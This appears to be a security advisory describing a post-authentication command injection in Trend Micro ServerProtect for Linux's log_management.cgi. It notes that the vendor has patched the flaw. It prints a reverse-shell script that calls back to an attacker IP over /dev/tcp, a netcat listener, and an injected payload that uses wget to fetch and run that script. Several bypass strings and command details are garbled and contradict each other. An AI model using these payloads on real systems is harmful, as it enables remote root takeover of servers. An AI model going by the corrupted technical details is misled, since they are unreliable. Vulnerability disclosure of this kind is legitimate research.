Trend Micro ServerProtect for Linux Command Injection
Trend Micro ServerProtect for Linux (ServerProtect) provides comprehensive protection against viruses, worms, Trojans, and spyware/grayware targeted at file servers based on the Linux operating system. Managed through an intuitive portable Web-based console, ServerProtect provides centralized virus/malware scanning, pattern updates, event reporting, and antivirus configuration.
More information at https://success.trendmicro.com/product-support/serverprotect-for-linux
A command injection vulnerability was found in ServerProtect for Linux. The log_management.cgi script does not sanitize an input parameter before it is used in a system command. The issue can be exploited after logging in as administrator, giving the attacker remote code execution.
Post-Auth Remote Code Execution.
When ServerProtect is installed, it runs with root privileges.
ServerProtect has a web interface; on a fresh install the administrator account can be logged into with a null (empty) password.
"Log Directory" is a page that lets the user specify where all the log files are stored. If that directory does not exist yet, a form pops up asking whether the user wants to create it.
After the save-log-directory request is submitted, the value is saved in /opt/TrendMicro/SProtectLinux/tmaplui.xml. The application then uses the amvalidator binary in /opt/TrendMicro/SProtectLinux/SPLX.vsapiapp/ to parse that XML file.
We reverse engineered the amvalidator binary and found that it calls system("command") to create the folder if it does not exist yet. The "command" string starts as
command = "/bin/mkdir -p -m 0700" ...
It then appends the new directory "NEW_PATH" that was entered in the web interface:
command += "/bin/PATH" + "NEW_PATH"
So a command can be injected through "NEW_PATH".
We first attempted command injection here with the command "touch EC{EORC}", but it did not work: slashes were added before "[EKORC]". We then attempted to bypass this with "{{FS}}".
The injected command thus became "touch\$(FS){ECO}RC", and the full value passed in the "T1" parameter was "/a/touch\$(FS){ECO}RC/". The web client checks several characters client-side, so the request had to be intercepted and sent through Burp Suite.
We then found that the file "ECORC" had been created in the folder "/opt/TrendMicro/SProtectLinux/ECORC".
As a proof of concept, we created a reverse shell that connects back to our server.
First, we created a simple reverse-shell script named "index.html" on our server; "192.168.1.100" is the attacker server and "31337" is the port listening on it.
#!/bin/bash
bash -i >& /dev/tcp/192.168.1.100:31337 0>&1
Then we served it over HTTP on port "5555" with Python's built-in HTTP server:
$ python3 -m http.server 5555
In another terminal, we listened on port "31337" to wait for the reverse shell.
$ nc -lvnp 31337
Then we sent a POST request to https://[HOST]:14243/SProtectLinux/log_management.cgi with the following payload in the "T1" parameter:
/b;wget\$(FS){IFS}192.168.1.100:5555;bash\$(FS){IFS}index.html
Trend Micro has released a Critical Patch (CP) for Trend Micro ServerProtect for Linux 3.0 that resolves this command injection vulnerability: https://success.trendmicro.com/solution/000268419